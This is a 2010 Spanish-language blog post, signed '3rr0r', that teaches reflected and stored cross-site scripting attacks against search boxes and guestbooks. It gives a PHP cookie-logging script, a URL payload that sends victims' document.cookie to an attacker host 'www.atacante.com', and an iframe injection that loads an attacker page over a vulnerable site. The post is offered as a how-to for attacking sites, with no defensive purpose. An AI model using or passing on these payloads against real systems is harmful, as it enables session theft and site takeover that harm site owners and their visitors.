diumenge, 26 de setembre del 2010

Otra forma de XSS ( Cross Site Scripting ) algo mas detallada

Hay dos formas para poder usar este ataque: a un buscador, o a otro tipo de formulario (un libro de visitas o un  tag  por ejemplo)

Buscador:
Lo primero encontrar un buscador, para saber si es vulnerable introducir el siguiente código:

<script>alert(hola)</script>

Si es vulnerables, saldrá un ventana que pondrá hola, en caso contrario no saldrá nada.
Si vulnerable, el siguiente paso es ver el name  del buscador y del botón de búsqueda.

<input type="text" name="palabra"> que será el formulario.
<input type="submit" name="buscar" value="Buscar"> que será el boton.


La caja de texto donde ponemos lo que vamos a buscar se llama palabra y el botón buscar.


Ahora lo que hay que hacer es almacenar las cookies en un archivo d texto para ello creamos un archivo PHP que contenga el siguiente código.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=cookies.php-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Código:
##################################
# <?                             #
# $cookie = $_GET['cookie'];     #
# $fff = fopen("cookie.txt","a");#
# fwrite($fff, "$cookie \n");    #
# fclose($fff);                  #
# ?>                             #
##################################
lo que hace este código es guardar la cookie en un archivo txt que se llama cookie.txt.


Una vez hecho este paso solo tenemos que crear URL que ejecute a cookie.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



=-=-=-=-=-= | * Código: * | =-=-=-=-=-=

http://www.vulnerable.com/buscador.php?palabra=<script>window.location=
'http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;


=-=-=-=-=-= | * Formulario: * | =-=-=-=-=-=
Buscamos un libro de visitas o un tag y probamos que sea vulnerable:

#############################
<script>alert(hola)</script>
#############################

Si es vulnerable, creamos un archivo PHP que se llama owned.php (por ejemplo) y  introducimos el siguiente código (ademas de lo que se quiera poner en el nuevo index) en fichero owned:

##################################
<SCRIPT TYPE="text/javascript" LANGUAGE=JAVASCRIPT>
<!--
if (top.frames.length!=0)
top.location=self.document.location;
// -->
</SCRIPT>
##################################

Este codigo hace que se el IFRAME la pagina principal. Despues en la caja de texto del formularios vulnerable ponemos lo suiguiente:

<iframe src=http://www.atacante.org/owned.php>

Con esto hacemos que cuando alguien linkea a el formulario automaticamenta carga nuestro owned.php y lo pone como pagina principal.


######################################################################


Editado por 3rr0r

Cap comentari:

Publica un comentari a l'entrada